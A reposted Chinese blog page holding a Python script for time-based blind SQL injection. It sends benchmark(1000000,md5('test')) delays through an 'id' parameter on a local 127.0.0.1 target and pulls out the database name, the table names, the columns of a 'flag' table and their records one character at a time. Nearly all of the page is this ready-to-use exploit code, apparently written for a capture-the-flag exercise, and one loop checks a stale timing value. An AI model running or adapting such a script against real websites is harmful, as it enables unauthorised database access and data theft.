博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
sql注入------基于时间延迟benchmark函数注入脚本
阅读量:5105 次
发布时间:2019-06-13

本文共 6036 字,大约阅读时间需要 20 分钟。

#author:windy_2 import requestsurlx = 'http://127.0.0.1/?id= 1 and if((substr((select database()),'payloads = 'qwertyuiopasdfghjklzxcvbnm{}_0123456789'def guess_column(table):    string = ''    extend = 0    list = []    length2 = 0    num = []    num1 = []    url1 = 'http://127.0.0.1/?id= 1 and if(((select count(column_name) from information_schema.columns where table_name=\''+ table + '\')='    url2 = 'http://127.0.0.1/?id= 1 and if((substr((select column_name from information_schema.columns where table_name=\'' + table + '\' limit '    url3 = 'http://127.0.0.1/?id= 1 and if(((select length(column_name) from information_schema.columns where table_name=\'' + table + '\' limit '    url4 = 'http://127.0.0.1/?id= 1 and if(((substr((select '    url5 = 'http://127.0.0.1/?id= 1 and if(((select count('    url7 = 'http://127.0.0.1/?id= 1 and if(((select length('    for i in range(50):                                               #获取字段数量        url = url1 + str(i) + '),benchmark(1000000,md5(\'test\')),NULL); %23'        r = requests.get(url)        print(url)        time = r.elapsed.total_seconds()        print(time)        if time > 1.5:            extend = i            length2 = i            break    for k in range(extend):                                         st = ''        extend1 = 0        for m in range(100):            url = url3 + str(k) + ',1)=' + str(m) + '),benchmark(1000000,md5(\'test\')),NULL); %23'       #获取字段长度            r = requests.get(url)            if time > 1.5:                extend1 = m                break        for i in range(1,extend1+1):         #获取字段            for payload in payloads:                url = url2 + str(k) + ',1),' + str(i) + ',1)=\'' + payload + '\'),benchmark(1000000,md5(\'test\')),NULL); %23'                r = requests.get(url)                time = r.elapsed.total_seconds()                if time > 1.5:                    print(url)                    st += payload                    break        list.append(st)        num1.append(st)    length = 0    for i in range(1,10000):                 #获取记录数量        url = url5 + str(num1[0]) + ') from ' + table + ')=' + str(i) + '),benchmark(1000000,md5(\'test\')),NULL); %23'        print(url)        r = requests.get(url)        time = r.elapsed.total_seconds()        if time > 1.5:            length = i            break    for column in list:        str1 = ''        for i in range(length):                           length1 = 0            url6 = url4 + str(column) + ' from ' + table + ' limit ' + str(i)            for k in range(100):                  #获取记录长度                url = url7 + str(column) + ') from '+ table + ' limit ' + str(i) + ',1)=' + str(k) + '),benchmark(1000000,md5(\'test\')),NULL); %23'                r = requests.get(url)                time = r.elapsed.total_seconds()                if time > 1.5:                    print(url)                    length1 = k                    break            for n in range(1,length1+1):              #获取记录                for payload in payloads:                    url = url6 + ',1),' + str(n) + ',1))=\'' + str(payload) + '\'),benchmark(1000000,md5(\'test\')),NULL); %23'                     r = requests.get(url)                    time = r.elapsed.total_seconds()                    if time > 1.5:                        print(url)                        str1 += payload                        break            num.append(str1)            str1 = ''    for column in num1:        print(column+'    ',end='')    print('\n',end='')    for i in range(length2):        for k in range(length):            x = i + length * k            print(num[x]+'    ',end='')        print('\n',end='')def guess_table():    string = ''    extend = 0    list = []    url1 = 'http://127.0.0.1/?id= 1 and if(((select count(table_name) from information_schema.tables where table_schema=database())='    url2 = 'http://127.0.0.1/?id= 1 and if((substr((select table_name from information_schema.tables where table_schema=database() limit '    url3 = 'http://127.0.0.1/?id= 1 and if(((select length(table_name) from information_schema.tables where table_schema=database() limit '    for i in range(50):        url = url1 + str(i) + '),benchmark(1000000,md5(\'test\')),NULL); %23'        r = requests.get(url)        time = r.elapsed.total_seconds()        if time > 1.5:            extend = i            break    for k in range(extend):        st = ''        extend1 = 0        for m in range(100):            url = url3 + str(k) + ',1)=' + str(m) + '),benchmark(1000000,md5(\'test\')),NULL); %23'            r = requests.get(url)            time = r.elapsed.total_seconds()            if time > 1.5:                extend1 = m                break        for i in range(1,extend1+1):            for payload in payloads:                url = url2 + str(k) + ',1),' + str(i) + ',1)=\'' + payload + '\'),benchmark(1000000,md5(\'test\')),NULL); %23'                r = requests.get(url)                time = r.elapsed.total_seconds()                if time > 1.5:                    st += payload                    break        list.append(st)    print('------------')    for i in list:        print(f'[*]{i}')    print('------------')    guess_column('flag')def main():    string = ''    url1 = 'http://127.0.0.1/?id= 1 and if((length(database())='    extend = 0    for k in range(20):        url = url1 + str(k) + '),benchmark(1000000,md5(\'test\')),NULL); %23'        r = requests.get(url)        time = r.elapsed.total_seconds()        if time > 1.5:            extend = k            break    for i in range(1,extend+1):        for payload in payloads:            url = urlx + str(i) + ',1)=\''            url = url + payload + '\'),benchmark(1000000,md5(\'test\')),NULL); %23'            r = requests.get(url)            time = r.elapsed.total_seconds()            if time > 1.5:                string += payload                break    print(f'available database\n[*] {string}')    guess_table()    main()

 

转载于:https://www.cnblogs.com/aWxvdmVseXc0/p/10029914.html

你可能感兴趣的文章
c#运算符 ?
查看>>
ps互补色
查看>>
Silverlight学习笔记(九)-----RenderTransform特效【五种基本变换】及【矩阵变换MatrixTransform】...
查看>>
【题解】青蛙的约会
查看>>
【eclipse】点Clean后没反应
查看>>
springboot下html的js中使用shiro标签功能
查看>>
求给定字符串的最长子字符串
查看>>
.26-浅析webpack源码之事件流make(1)
查看>>
IO流
查看>>
mybatis调用存储过程,获取返回的游标
查看>>
Android Handler学习笔记
查看>>
设计模式之装饰模式(结构型)
查看>>
面向对象的设计原则
查看>>
解释性语言和编译性语言的区别
查看>>
Swift3.0服务端开发(三) Mustache页面模板与日志记录
查看>>
Java读取.properties配置文件的几种方法
查看>>
【转】 FPGA设计的四种常用思想与技巧
查看>>
移动端页面头部定义
查看>>
职责链模式(Chain of Responsibility)
查看>>
C++:同名隐藏和赋值兼容规则
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2024-11-17 15:55:01   当前IP: 3.141.7.140   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我